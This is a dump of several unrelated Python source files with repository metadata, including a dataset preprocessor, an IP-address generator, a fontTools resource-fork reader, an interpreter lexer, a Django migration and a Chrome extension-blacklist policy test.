cur_classes, cur_tokens, cur_outputs = [], [], []
with open(data_file, 'r', encoding='utf-8') as f:
for linectx, line in tqdm(enumerate(f)):
es = line.strip().split('\t')
if split == "test":
# For the results reported in the paper "RNN Approaches to Text Normalization: A Challenge":
# + For English, the first 100,002 lines of output-00099-of-00100 are used for the test set
# + For Russian, the first 100,007 lines of output-00099-of-00100 are used for the test set
if lang == constants.ENGLISH and linectx == TEST_SIZE_EN:
break
if lang == constants.RUSSIAN and linectx == TEST_SIZE_RUS:
break
if len(es) == 2 and es[0] == '<eos>':
data.append((cur_classes, cur_tokens, cur_outputs))
# Reset
cur_classes, cur_tokens, cur_outputs = [], [], []
continue
# Remove _trans (for Russian)
if lang == constants.RUSSIAN:
es[2] = es[2].replace('_trans', '')
# Update the current example
assert len(es) == 3
cur_classes.append(es[0])
cur_tokens.append(es[1])
cur_outputs.append(es[2])
return data
if __name__ == '__main__':
parser = ArgumentParser(description='Preprocess Google text normalization dataset')
parser.add_argument('--data_dir', type=str, required=True, help='Path to folder with data')
parser.add_argument('--output_dir', type=str, default='preprocessed', help='Path to folder with preprocessed data')
parser.add_argument(
'--lang', type=str, default=constants.ENGLISH, choices=constants.SUPPORTED_LANGS, help='Language'
)
args = parser.parse_args()
# Create the output dir (if not exist)
if not isdir(args.output_dir):
mkdir(args.output_dir)
mkdir(args.output_dir + '/train')
mkdir(args.output_dir + '/dev')
mkdir(args.output_dir + '/test')
for fn in sorted(listdir(args.data_dir))[::-1]:
fp = join(args.data_dir, fn)
if not isfile(fp):
continue
if not fn.startswith('output'):
continue
# Determine the current split
split_nb = int(fn.split('-')[1])
if split_nb < 90:
cur_split = "train"
elif split_nb < 95:
cur_split = "dev"
elif split_nb == 99:
cur_split = "test"
data = read_google_data(data_file=fp, lang=args.lang, split=cur_split)
# write out
output_file = join(args.output_dir, f'{cur_split}', f'{fn}.tsv')
print(fp)
print(output_file)
output_f = open(output_file, 'w', encoding='utf-8')
for inst in data:
cur_classes, cur_tokens, cur_outputs = inst
for c, t, o in zip(cur_classes, cur_tokens, cur_outputs):
output_f.write(f'{c}\t{t}\t{o}\n')
output_f.write('<eos>\t<eos>\n')
print(f'{cur_split}_sentences: {len(data)}')
|
[
"noreply@github.com"
] |
VahidooX.noreply@github.com
|
b02a3215d5c955daec98e2db06f5171974b90720
|
05ec80585e500eb75baade82bada8f0c5a2a76dc
|
/Backtracking/GenerateIP.py
|
4b339410a665caec82a4815768bb4049c6a8bab4
|
[] |
no_license
|
NenadPantelic/GeeksforGeeks-Must-Do-Interview-preparation
|
24477da148d4b9fe8113f669f21984d081327563
|
180c6b1bc6a4b6e1b44c409c220368b391b672b8
|
refs/heads/master
| 2021-01-05T19:16:22.436554
| 2020-11-15T14:39:02
| 2020-11-15T14:39:02
| 241,113,139
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 25 21:19:12 2020
@author: nenad
"""
def is_valid(ip, pos,segments):
len_flag = True
# ip is not valid in form 0x e.g 121.03.22.234
if len(ip) > 1 and ip[0] == "0":
len_flag = False
# check ip length, value and if ip's part is already checked
return len_flag and len(ip) > 0 and 0 <= int(ip) <= 255 and segments[pos] == False
def genIP(string):
ips = []
n = len(string)
segments = [False] * n
solve(string, n, 0, ips, segments, [])
print(ips)
def solve(string, n, pos, ips,segments, ip):
# ip has 4 parts
if len(ip) == 4:
# if we raached end of the string that we process
if pos>=n:
ips.append(".".join(ip))
return
# one part of ip has length from 1 to 3, both inclusive
for i in range(1,min(4, n-pos+1)):
# take substring as ip's quartette
substr = string[pos:pos+i]
# if ip is valid
if is_valid(substr, pos,segments):
# mark that char as used
segments[pos] = True
# check the rest of the string - can we form the rest of ip from that substring
solve(string, n, pos+i, ips, segments, ip + [substr])
# backtrack if we can't do that
segments[pos] = False
return
# Test 0
string = "1111"
genIP(string)
# Test 1
string = "11211"
genIP(string)
# Test 2
string = "112112"
genIP(string)
# Test 3
string = "25500255"
genIP(string)
|
[
"nenadpantelickg@gmail.com"
] |
nenadpantelickg@gmail.com
|
540590ef128c7fc98cb5a28c475cbf774c51ff24
|
d96787f92bd86c8d8bcf01a4e7ec8f7feec24194
|
/kattis/nizovi/solution.py
|
9c70b792c4c93471dd6c04868b1338089c92b9f2
|
[] |
no_license
|
iandioch/solutions
|
133cbc3af58fadcde0b2e981fb0e7d05801070a7
|
8b3e458b3c01179ddf776bfbb897f263f22f3693
|
refs/heads/master
| 2023-04-09T03:39:16.952817
| 2023-03-15T20:00:53
| 2023-03-15T20:00:53
| 47,693,495
| 48
| 40
| null | 2019-10-22T14:52:59
| 2015-12-09T13:36:55
|
Python
|
UTF-8
|
Python
| false
| false
| 721
|
py
|
s = input()
curr = ''
indent = 0
lines = []
for c in s:
curr += c
if curr == '{':
lines.append('{}{}'.format(' '*indent, c))
curr = ''
indent += 2
elif curr.endswith('}') or curr.endswith('},'):
d = curr.find('}')
if len(curr[:d]) > 0:
lines.append('{}{}'.format(' '*indent, curr[:d]))
indent -= 2
lines.append('{}{}'.format(' '*indent, curr[d:]))
curr = ''
elif curr[-1] == ',':
lines.append('{}{}'.format(' '*indent, curr))
curr = ''
# remove commas trailing afer }s
for j in range(len(lines)-1, -1, -1):
if lines[j].strip() == ',':
del lines[j]
lines[j-1] += ','
print('\n'.join(lines))
|
[
"iandioch11@gmail.com"
] |
iandioch11@gmail.com
|
b632edb4abed10644c2eca37adee10ff3ebf2a1e
|
080397d0e6d573ef6d7eb9c2bc6b1b5787cfe0d1
|
/tests/twitter_learning_journal/builders/test_cache_path_builder.py
|
2dfeb176343ff67367981b17880cefdbe6d09dac
|
[
"Beerware"
] |
permissive
|
DEV3L/twitter-learning-journal
|
ecd0eb922e369b10fd6e039d652eed7078601139
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
refs/heads/master
| 2021-09-20T17:27:11.157096
| 2018-08-13T11:58:34
| 2018-08-13T11:58:34
| 114,556,953
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
py
|
from app.twitter_learning_journal.builders.cache_path_builder import build_cache_path
def test_build_cache_path():
expected_cache_path = './data/pickle/tweets/test'
assert expected_cache_path == build_cache_path(sub_directory='test')
|
[
"jus.beall@gmail.com"
] |
jus.beall@gmail.com
|
dc9388fcc7ecf66dabb9bc64fe98c2f689c370d6
|
20176bf4fbd8aec139c7b5a27f2c2e155e173e6e
|
/data/all-pratic/Anusha Koila/print_odd_num.py
|
d290d9c8c6e77770c4fb451217c46810fd11629d
|
[] |
no_license
|
githubjyotiranjan/pytraining
|
4ac4a1f83cc4270e2939d9d32c705019c5bc61c5
|
8b50c4ab7848bd4cbfdfbc06489768d577289c66
|
refs/heads/master
| 2020-03-19T06:22:20.793296
| 2018-06-15T20:08:11
| 2018-06-15T20:08:11
| 136,013,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 337
|
py
|
#print odd numbers
#raise exception when negtive numbers are inputted
try:
num = int(input("Enter an number :"))
except erro1:
if(num<0):
print("Negative numbers not allowed")
else:
print("ODD numbers list :\n ")
for i in range(1,num):
res=i%2
if(res!=0):
print(i)
i=i+1
|
[
"jsatapathy007@gmail.com"
] |
jsatapathy007@gmail.com
|
93196c7e4c3d9aee7a600a779e6f089b06a181e0
|
13eae91d078c8b88c990bb6da1b9cdb8e3648b76
|
/cogs/Downloader/lib/fontTools/misc/macRes.py
|
e8b3cbc20ed28d5048adec1ba0a12c560f11c715
|
[] |
no_license
|
skylarr1227/skybizzle
|
98303c99a5ea897469e381e06dcda3725d6500d6
|
63c38995437d6880bd9bf0de52d406c904cbbd24
|
refs/heads/master
| 2023-05-13T00:12:46.827511
| 2019-11-12T01:03:45
| 2019-11-12T01:03:45
| 221,097,000
| 0
| 1
| null | 2023-05-07T06:22:44
| 2019-11-12T00:40:38
|
Python
|
UTF-8
|
Python
| false
| false
| 6,591
|
py
|
""" Tools for reading Mac resource forks. """
from fontTools.misc.py23 import *
import struct
from fontTools.misc import sstruct
from collections import OrderedDict
try:
from collections.abc import MutableMapping
except ImportError:
from UserDict import DictMixin as MutableMapping
class ResourceError(Exception):
pass
class ResourceReader(MutableMapping):
def __init__(self, fileOrPath):
self._resources = OrderedDict()
if hasattr(fileOrPath, 'read'):
self.file = fileOrPath
else:
try:
# try reading from the resource fork (only works on OS X)
self.file = self.openResourceFork(fileOrPath)
self._readFile()
return
except (ResourceError, IOError):
# if it fails, use the data fork
self.file = self.openDataFork(fileOrPath)
self._readFile()
@staticmethod
def openResourceFork(path):
if hasattr(path, "__fspath__"): # support os.PathLike objects
path = path.__fspath__()
with open(path + '/..namedfork/rsrc', 'rb') as resfork:
data = resfork.read()
infile = BytesIO(data)
infile.name = path
return infile
@staticmethod
def openDataFork(path):
with open(path, 'rb') as datafork:
data = datafork.read()
infile = BytesIO(data)
infile.name = path
return infile
def _readFile(self):
self._readHeaderAndMap()
self._readTypeList()
def _read(self, numBytes, offset=None):
if offset is not None:
try:
self.file.seek(offset)
except OverflowError:
raise ResourceError("Failed to seek offset ('offset' is too large)")
if self.file.tell() != offset:
raise ResourceError('Failed to seek offset (reached EOF)')
try:
data = self.file.read(numBytes)
except OverflowError:
raise ResourceError("Cannot read resource ('numBytes' is too large)")
if len(data) != numBytes:
raise ResourceError('Cannot read resource (not enough data)')
return data
def _readHeaderAndMap(self):
self.file.seek(0)
headerData = self._read(ResourceForkHeaderSize)
sstruct.unpack(ResourceForkHeader, headerData, self)
# seek to resource map, skip reserved
mapOffset = self.mapOffset + 22
resourceMapData = self._read(ResourceMapHeaderSize, mapOffset)
sstruct.unpack(ResourceMapHeader, resourceMapData, self)
self.absTypeListOffset = self.mapOffset + self.typeListOffset
self.absNameListOffset = self.mapOffset + self.nameListOffset
def _readTypeList(self):
absTypeListOffset = self.absTypeListOffset
numTypesData = self._read(2, absTypeListOffset)
self.numTypes, = struct.unpack('>H', numTypesData)
absTypeListOffset2 = absTypeListOffset + 2
for i in range(self.numTypes + 1):
resTypeItemOffset = absTypeListOffset2 + ResourceTypeItemSize * i
resTypeItemData = self._read(ResourceTypeItemSize, resTypeItemOffset)
item = sstruct.unpack(ResourceTypeItem, resTypeItemData)
resType = tostr(item['type'], encoding='mac-roman')
refListOffset = absTypeListOffset + item['refListOffset']
numRes = item['numRes'] + 1
resources = self._readReferenceList(resType, refListOffset, numRes)
self._resources[resType] = resources
def _readReferenceList(self, resType, refListOffset, numRes):
resources = []
for i in range(numRes):
refOffset = refListOffset + ResourceRefItemSize * i
refData = self._read(ResourceRefItemSize, refOffset)
res = Resource(resType)
res.decompile(refData, self)
resources.append(res)
return resources
def __getitem__(self, resType):
return self._resources[resType]
def __delitem__(self, resType):
del self._resources[resType]
def __setitem__(self, resType, resources):
self._resources[resType] = resources
def __len__(self):
return len(self._resources)
def __iter__(self):
return iter(self._resources)
def keys(self):
return self._resources.keys()
@property
def types(self):
return list(self._resources.keys())
def countResources(self, resType):
"""Return the number of resources of a given type."""
try:
return len(self[resType])
except KeyError:
return 0
def getIndices(self, resType):
numRes = self.countResources(resType)
if numRes:
return list(range(1, numRes+1))
else:
return []
def getNames(self, resType):
"""Return list of names of all resources of a given type."""
return [res.name for res in self.get(resType, []) if res.name is not None]
def getIndResource(self, resType, index):
"""Return resource of given type located at an index ranging from 1
to the number of resources for that type, or None if not found.
"""
if index < 1:
return None
try:
res = self[resType][index-1]
except (KeyError, IndexError):
return None
return res
def getNamedResource(self, resType, name):
"""Return the named resource of given type, else return None."""
name = tostr(name, encoding='mac-roman')
for res in self.get(resType, []):
if res.name == name:
return res
return None
def close(self):
if not self.file.closed:
self.file.close()
class Resource(object):
def __init__(self, resType=None, resData=None, resID=None, resName=None,
resAttr=None):
self.type = resType
self.data = resData
self.id = resID
self.name = resName
self.attr = resAttr
def decompile(self, refData, reader):
sstruct.unpack(ResourceRefItem, refData, self)
# interpret 3-byte dataOffset as (padded) ULONG to unpack it with struct
self.dataOffset, = struct.unpack('>L', bytesjoin([b"\0", self.dataOffset]))
absDataOffset = reader.dataOffset + self.dataOffset
dataLength, = struct.unpack(">L", reader._read(4, absDataOffset))
self.data = reader._read(dataLength)
if self.nameOffset == -1:
return
absNameOffset = reader.absNameListOffset + self.nameOffset
nameLength, = struct.unpack('B', reader._read(1, absNameOffset))
name, = struct.unpack('>%ss' % nameLength, reader._read(nameLength))
self.name = tostr(name, encoding='mac-roman')
ResourceForkHeader = """
> # big endian
dataOffset: L
mapOffset: L
dataLen: L
mapLen: L
"""
ResourceForkHeaderSize = sstruct.calcsize(ResourceForkHeader)
ResourceMapHeader = """
> # big endian
attr: H
typeListOffset: H
nameListOffset: H
"""
ResourceMapHeaderSize = sstruct.calcsize(ResourceMapHeader)
ResourceTypeItem = """
> # big endian
type: 4s
numRes: H
refListOffset: H
"""
ResourceTypeItemSize = sstruct.calcsize(ResourceTypeItem)
ResourceRefItem = """
> # big endian
id: h
nameOffset: h
attr: B
dataOffset: 3s
reserved: L
"""
ResourceRefItemSize = sstruct.calcsize(ResourceRefItem)
|
[
"skylarr1227@gmail.comgit config --global user.email skylarr1227@gmail.com"
] |
skylarr1227@gmail.comgit config --global user.email skylarr1227@gmail.com
|
d4cb57f250e733e13d0676e9b5d25d710f3cafad
|
7f52bb7c3a5ed3be6821306137c5217362d06dc3
|
/manage.py
|
3b50f6ea9203cf02974bbf61451c2a74f68e4d63
|
[] |
no_license
|
payush/cristianoronaldoyopmailcom-307
|
547f36250cf3c9c94bdea0fe8c7a1e3e1194294a
|
d2f2a1f76ab354e391bab8a628782c80a3b1c97a
|
refs/heads/master
| 2020-03-23T14:24:53.428495
| 2018-07-20T06:44:00
| 2018-07-20T06:44:00
| 141,674,090
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 828
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cristianoronaldoyopmailcom_307.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"ayushpuroheet@gmail.com"
] |
ayushpuroheet@gmail.com
|
af9bfb5814f5f4141fc5fd9980c003da790129c1
|
2dbd4a34f6da93c0e70e8517971672a010db93dc
|
/py_m/lexer_.py
|
2bc01b0157aa225fd69bd537af1b174f584f269a
|
[] |
no_license
|
kawain/copy_interpreter
|
44eebe43c6b9ddefa94066577dcd5779a933f426
|
94e7a6d5d03b528b9138c17a5a6828f6332fa98d
|
refs/heads/master
| 2023-04-26T02:51:46.457263
| 2021-05-22T07:48:52
| 2021-05-22T07:48:52
| 356,544,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,363
|
py
|
from token_ import TokenType, Token
class Lexer:
"""字句解析"""
def __init__(self, input, position=0, next_position=0, ch=""):
self.input = input
self.position = position
self.next_position = next_position
self.ch = ch
self.size = len(self.input)
self.read_char()
def read_char(self):
if self.next_position >= self.size:
self.ch = ""
else:
self.ch = self.input[self.next_position]
self.position = self.next_position
self.next_position += 1
def skip_whitespace(self):
while self.ch == " " or self.ch == "\t" or self.ch == "\n" or self.ch == "\r":
self.read_char()
@staticmethod
def is_letter(v):
if v.isalpha():
return True
elif v == "_":
return True
else:
return False
@staticmethod
def is_digit(v):
if v.isdigit():
return True
elif v == '.':
return True
else:
return False
def peek_char(self):
if self.next_position >= self.size:
return ""
else:
return self.input[self.next_position]
def read_identifier(self):
position = self.position
while self.is_letter(self.ch):
self.read_char()
return self.input[position:self.position]
def read_number(self):
position = self.position
while self.is_digit(self.ch):
self.read_char()
return self.input[position:self.position]
def read_string(self):
position = self.position + 1
while True:
self.read_char()
if self.ch == '"' or self.ch == "":
break
return self.input[position:self.position]
def next_token(self):
tok = Token()
self.skip_whitespace()
if self.ch == "=":
if self.peek_char() == "=":
self.read_char()
tok.token_type = TokenType.EQ
tok.literal = "=="
else:
tok.token_type = TokenType.ASSIGN
tok.literal = "="
elif self.ch == "+":
tok.token_type = TokenType.PLUS
tok.literal = self.ch
elif self.ch == "-":
tok.token_type = TokenType.MINUS
tok.literal = self.ch
elif self.ch == "!":
if self.peek_char() == "=":
self.read_char()
tok.token_type = TokenType.NOT_EQ
tok.literal = "!="
else:
tok.token_type = TokenType.BANG
tok.literal = "!"
elif self.ch == "/":
tok.token_type = TokenType.SLASH
tok.literal = self.ch
elif self.ch == "*":
tok.token_type = TokenType.ASTERISK
tok.literal = self.ch
elif self.ch == "<":
tok.token_type = TokenType.LT
tok.literal = self.ch
elif self.ch == ">":
tok.token_type = TokenType.GT
tok.literal = self.ch
elif self.ch == ";":
tok.token_type = TokenType.SEMICOLON
tok.literal = self.ch
elif self.ch == ",":
tok.token_type = TokenType.COMMA
tok.literal = self.ch
elif self.ch == "{":
tok.token_type = TokenType.LBRACE
tok.literal = self.ch
elif self.ch == "}":
tok.token_type = TokenType.RBRACE
tok.literal = self.ch
elif self.ch == "(":
tok.token_type = TokenType.LPAREN
tok.literal = self.ch
elif self.ch == ")":
tok.token_type = TokenType.RPAREN
tok.literal = self.ch
elif self.ch == '"':
tok.token_type = TokenType.STRING
tok.literal = self.read_string()
elif self.ch == "[":
tok.token_type = TokenType.LBRACKET
tok.literal = self.ch
elif self.ch == "]":
tok.token_type = TokenType.RBRACKET
tok.literal = self.ch
elif self.ch == "":
tok.token_type = TokenType.EOF
tok.literal = ""
else:
if self.is_letter(self.ch):
tok.literal = self.read_identifier()
tok.token_type = tok.lookup_ident(tok.literal)
return tok
elif self.is_digit(self.ch):
literal = self.read_number()
if literal.count(".") == 0:
tok.token_type = TokenType.INT
tok.literal = literal
return tok
elif literal.count(".") == 1:
tok.token_type = TokenType.FLOAT
tok.literal = literal
return tok
else:
tok.token_type = TokenType.ILLEGAL
tok.literal = literal
else:
tok.token_type = TokenType.ILLEGAL
tok.literal = self.ch
self.read_char()
return tok
def __str__(self):
return "Lexer()"
if __name__ == "__main__":
pass
|
[
"unknown@example.com"
] |
unknown@example.com
|
e96605d4527a4551d1105f8932434a99310e65b9
|
561c590ec93131ceb58c21912a375b6e0d50bedb
|
/jiang_fenci/hmm_segment/segment/model.py
|
f02feafaf66f8f9e98368fd143fd2570a3590bb7
|
[] |
no_license
|
chuanfanyoudong/nlp_learn
|
3607555e59789240afd6c4a9620cc6e678e0afb3
|
9fbb6781640ab9aba561dc2de0066a1f1e5882a0
|
refs/heads/master
| 2020-04-07T13:25:16.118562
| 2019-04-24T07:18:33
| 2019-04-24T07:18:33
| 158,406,684
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,045
|
py
|
# -*- coding: utf-8 -*-
"""
SEGMENT
--------
封装hmm分词模型
"""
import numpy as np
from hmmlearn.hmm import MultinomialHMM
from jiang_fenci.hmm_segment.segment.corpus import get_corpus
__model = None
class Segment:
def __init__(self):
self.corpus = get_corpus()
self.states, self.init_p = self.get_init_state()
self.trans_p = self.get_trans_state()
self.vocabs, self.emit_p = self.get_emit_state()
self.model = self.get_model()
def get_init_state(self):
"""
获取初始概率,转为hmm模型接受数据形式
"""
states = ['S', 'B', 'M', 'E']
init_state = self.corpus.get_state('init')
init_p = np.array([init_state[s] for s in states])
return states, init_p
def get_trans_state(self):
"""
获取转移概率,转为hmm模型接受数据形式
"""
trans_state = self.corpus.get_state('trans')
trans_p = np.array([[trans_state[s][ss] for ss in self.states] for s in self.states])
return trans_p
def get_emit_state(self):
"""
获取发射概率,转为hmm模型接受数据形式
"""
emit_state = self.corpus.get_state('emit')
vocabs = []
for s in self.states:
vocabs.extend([k for k, v in emit_state[s].items()])
vocabs = list(set(vocabs))
emit_p = np.array([[emit_state[s][w] for w in vocabs] for s in self.states])
return vocabs, emit_p
def get_model(self):
"""
初始化hmm模型
"""
model = MultinomialHMM(n_components=len(self.states))
model.startprob_ = self.init_p
model.transmat_ = self.trans_p
model.emissionprob_ = self.emit_p
return model
def pre_process(self, word):
"""
未知字处理
"""
if word in self.vocabs:
return self.vocabs.index(word)
else:
return len(self.vocabs)-1
def cut(self, sentence):
"""
分词
"""
seen_n = np.array([[self.pre_process(w) for w in sentence]]).T
log_p, b = self.model.decode(seen_n, algorithm='viterbi')
# print(len(sentence),len(b))
# print(sentence,b)
#print(self.states,len(b))
states = list(map(lambda x: self.states[int(x)], b))
#print(type(states),states)
cut_sentence = ''
for index in range(len(list(states))):
# print(list(states))
if list(states)[index] in ('S', 'E'):
cut_sentence += sentence[index]+' '
else:
cut_sentence += sentence[index]
return cut_sentence
@staticmethod
def stats(cut_corpus, gold_corpus):
"""
正确率、召回率、F1
"""
success_count = 0
cut_count = 0
gold_count = 0
for index in range(len(cut_corpus)):
cut_sentence = cut_corpus[index].split(' ')
gold_sentence = gold_corpus[index].split(' ')
cut_count += len(cut_sentence)
gold_count += len(gold_sentence)
for word in cut_sentence:
if word in gold_sentence:
success_count += 1
recall = float(success_count)/float(gold_count)
precision = float(success_count)/float(cut_count)
f1 = (2*recall*precision)/(recall+precision)
return [precision, recall, f1]
def test(self):
"""
分词测试
"""
test_corpus = self.corpus.get_test_corpus('test')
gold_corpus = [sentence.replace(' ', ' ').strip() for sentence in self.corpus.get_test_corpus('test_gold') if sentence]
cut_corpus = [self.cut(sentence).strip() for sentence in test_corpus if sentence]
result = self.stats(cut_corpus, gold_corpus)
# print(result)
return result
def get_model():
"""
单例模型获取
"""
global __model
if not __model:
__model = Segment()
return __model
|
[
"qaz3762541@163.com"
] |
qaz3762541@163.com
|
a6c3cf2f1f9a3458d0b562aef5935f76de142de7
|
1956883d52e4019bbf8bd7bbc3744cdd1376e128
|
/abutton.py
|
96ea6f9b2354e36232ba86e55ad6e83e85bbaeda
|
[
"MIT"
] |
permissive
|
Otumian-empire/tkinter-basic-gui
|
5d7f7c697e9ac40f34b598b166186733d0931202
|
8a561fde8f770119bc3108511388371b1bdcabf5
|
refs/heads/master
| 2020-06-18T13:41:17.248470
| 2019-07-15T18:51:40
| 2019-07-15T18:51:40
| 196,320,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
from tkinter import *
root = Tk()
x = 0
def increase():
global x
x += 1
label.configure(text=x)
def decrease():
global x
x -= 1
label.configure(text=x)
label = Label(text=x)
sendbutton = Button(text="increase", command=increase)
deletebutton = Button(text="decrease", command=decrease)
sendbutton.grid()
label.grid()
deletebutton.grid()
mainloop()
|
[
"popecan1000@gmail.com"
] |
popecan1000@gmail.com
|
47e01a8d79922beb1795fe91191db98c2627286b
|
61a8f496dbe1880398b0156940b1789ddfe8e081
|
/Week_7_Lab/Advanced/q10.py
|
3c2bfdedd51b4b0239a8993191d0ee3ac329def6
|
[] |
no_license
|
luca2849/CM1103-Problem-Solving-With-Python
|
e369cdc032249e3625ae5dbbd926703e20d11dd9
|
a10b7ee6b972b23528a983dd7fff78d097c08465
|
refs/heads/master
| 2020-04-04T15:07:01.179113
| 2018-12-13T12:07:19
| 2018-12-13T12:07:19
| 156,024,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 441
|
py
|
def rec_power(a,n):
# if n is 1 then return a
if n == 1:
return a
# recursively call this function for n/2 and call it factor
n = n/2
factor = rec_power(a, n)
# if n/2 is even return the square of factor
if (n/2) % 2 == 0:
return factor * factor
# if n/2 is odd then return the square of factor multiplied by a
if (n/2) % 2 == 1:
return factor * factor * a
print(rec_power(10, 4))
|
[
"="
] |
=
|
af8010a1e412e867091d19bae06ae1b90c345783
|
f993e252fc740471e71a6748685988fc0b5f2e34
|
/backend/driver/migrations/0001_initial.py
|
66dea496859c52c65d3e087e3245db062a3abc77
|
[] |
no_license
|
crowdbotics-apps/cobros-app-22778
|
b9b9561d693fc979de0af693ffa9e4ca4d57873d
|
0774fc76d1b8b484790ed1ec070c1f6455905c65
|
refs/heads/master
| 2023-01-12T16:46:05.469345
| 2020-11-19T17:57:14
| 2020-11-19T17:57:14
| 314,314,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,540
|
py
|
# Generated by Django 2.2.17 on 2020-11-19 17:02
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("delivery_order", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="DriverProfile",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("photo", models.URLField()),
("timestamp_created", models.DateTimeField(auto_now_add=True)),
("last_updated", models.DateTimeField(auto_now=True)),
("details", models.TextField(blank=True, null=True)),
(
"user",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
related_name="driverprofile_user",
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.CreateModel(
name="DriverOrder",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("timestamp_created", models.DateTimeField(auto_now_add=True)),
(
"driver",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="driverorder_driver",
to="driver.DriverProfile",
),
),
(
"order",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
related_name="driverorder_order",
to="delivery_order.Order",
),
),
],
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
4c5aa5950353440cacb41eae8812b9ebad525a8f
|
536656cd89e4fa3a92b5dcab28657d60d1d244bd
|
/chrome/test/enterprise/e2e/policy/extension_blacklist/extension_blacklist.py
|
d14b00fa20cb00fb2767361a0b60407fe2824f33
|
[
"BSD-3-Clause"
] |
permissive
|
ECS-251-W2020/chromium
|
79caebf50443f297557d9510620bf8d44a68399a
|
ac814e85cb870a6b569e184c7a60a70ff3cb19f9
|
refs/heads/master
| 2022-08-19T17:42:46.887573
| 2020-03-18T06:08:44
| 2020-03-18T06:08:44
| 248,141,336
| 7
| 8
|
BSD-3-Clause
| 2022-07-06T20:32:48
| 2020-03-18T04:52:18
| null |
UTF-8
|
Python
| false
| false
| 2,267
|
py
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
from chrome_ent_test.infra.core import environment, before_all, test
from infra import ChromeEnterpriseTestCase
@environment(file="../policy_test.asset.textpb")
class ExtensionInstallBlacklistTest(ChromeEnterpriseTestCase):
"""Test the ExtensionInstallBlacklist policy.
https://cloud.google.com/docs/chrome-enterprise/policies/?policy=ExtensionInstallBlacklist"""
@before_all
def setup(self):
self.InstallChrome('client2012')
self.InstallWebDriver('client2012')
def installExtension(self, url):
args = ['--url', url, '--text_only', '--wait', '5']
dir = os.path.dirname(os.path.abspath(__file__))
logging.info('Opening page: %s' % url)
output = self.RunWebDriverTest('client2012',
os.path.join(dir, '../install_extension.py'),
args)
return output
@test
def test_ExtensionBlacklist_all(self):
extension = '*'
self.SetPolicy('win2012-dc', r'ExtensionInstallBlacklist\1', extension,
'String')
self.RunCommand('client2012', 'gpupdate /force')
logging.info('Disabled extension install for ' + extension)
test_url = 'https://chrome.google.com/webstore/detail/google-hangouts/nckgahadagoaajjgafhacjanaoiihapd'
output = self.installExtension(test_url)
self.assertIn('blocked', output)
@test
def test_ExtensionBlacklist_hangout(self):
extension = 'nckgahadagoaajjgafhacjanaoiihapd'
self.SetPolicy('win2012-dc', r'ExtensionInstallBlacklist\1', extension,
'String')
self.RunCommand('client2012', 'gpupdate /force')
logging.info('Disabled extension install for ' + extension)
test_url = 'https://chrome.google.com/webstore/detail/google-hangouts/nckgahadagoaajjgafhacjanaoiihapd'
output = self.installExtension(test_url)
self.assertIn('blocked', output)
positive_test_url = 'https://chrome.google.com/webstore/detail/grammarly-for-chrome/kbfnbcaeplbcioakkpcpgfkobkghlhen'
output = self.installExtension(positive_test_url)
self.assertNotIn('blocked', output)
|
[
"pcding@ucdavis.edu"
] |
pcding@ucdavis.edu
|
365f109ecdc7bef348e0afda449d6ff9c1423a44
|
0892937e1ef77f110a05042fa49b9178221590a5
|
/quiz_app/admin.py
|
c54e0446c5f2b40a946d0f3ec5d7d08897fbfaa7
|
[] |
no_license
|
dmswl0311/nh_hackathon_quiz
|
aa2e0cc51db3abe45bdb6aadb96855528a149d63
|
c4fadf6a9249d6e8ad80d553f8c20a848bdfc851
|
refs/heads/master
| 2023-01-29T15:46:22.046038
| 2020-12-13T13:35:46
| 2020-12-13T13:35:46
| 320,609,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
from django.contrib import admin
from .models import Quiz, OX_Quiz
admin.site.register(Quiz)
admin.site.register(OX_Quiz)
|
[
"dmswl_0311@naver.com"
] |
dmswl_0311@naver.com
|
d06ba3a39c1339b3301e652807885c2348d249aa
|
75f3ddcebb39e1575d0e735090cbafae5bc05140
|
/setup.py
|
7d957bf60b9cd3b0c319e27de4efb82b1d33cecc
|
[
"BSD-3-Clause"
] |
permissive
|
ethen8181/ort_inference
|
372b548e98f4e6e6e5fde2bf5533a31c6e6273ce
|
2fdd7fe8479c4b8679f8e809fa2b3846ad96b3fe
|
refs/heads/main
| 2023-05-15T07:42:48.247881
| 2021-06-21T04:30:06
| 2021-06-21T04:30:06
| 376,840,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,471
|
py
|
# -*- coding: utf-8 -*-
import os
import sys
import subprocess
